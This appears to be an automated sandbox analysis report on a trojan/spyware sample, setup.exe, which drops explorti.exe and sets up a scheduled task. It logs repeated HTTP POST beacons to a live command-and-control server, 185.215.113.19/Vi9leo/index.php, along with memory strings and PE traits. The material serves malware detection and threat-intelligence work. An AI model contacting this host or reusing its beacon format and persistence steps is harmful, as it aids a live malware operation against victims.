Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4

Source: Joe Sandbox View

IP Address: 185.215.113.19 185.215.113.19

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002BBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

10_2_002BBD60

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 0000000A.00000002.3368400813.0000000001719000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.0000000001756000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php8
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpN
Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpa
Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpo
Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpr
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpt

System Summary

PE file contains section with special chars

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F3068	10_2_002F3068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002BE440	10_2_002BE440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002B4CF0	10_2_002B4CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002E7D83	10_2_002E7D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F765B	10_2_002F765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002B4AF0	10_2_002B4AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F8720	10_2_002F8720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F6F09	10_2_002F6F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F777B	10_2_002F777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F2BD0	10_2_002F2BD0

Source: setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: setup.exe	Static PE information: Section: ZLIB complexity 0.9998719262295082
Source: setup.exe	Static PE information: Section: rylhmesc ZLIB complexity 0.9945997846699479
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9998719262295082
Source: explorti.exe.0.dr	Static PE information: Section: rylhmesc ZLIB complexity 0.9945997846699479

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: setup.exe

ReversingLabs: Detection: 62%

Source: setup.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\user\Desktop\setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textshaping.dll	Jump to behavior
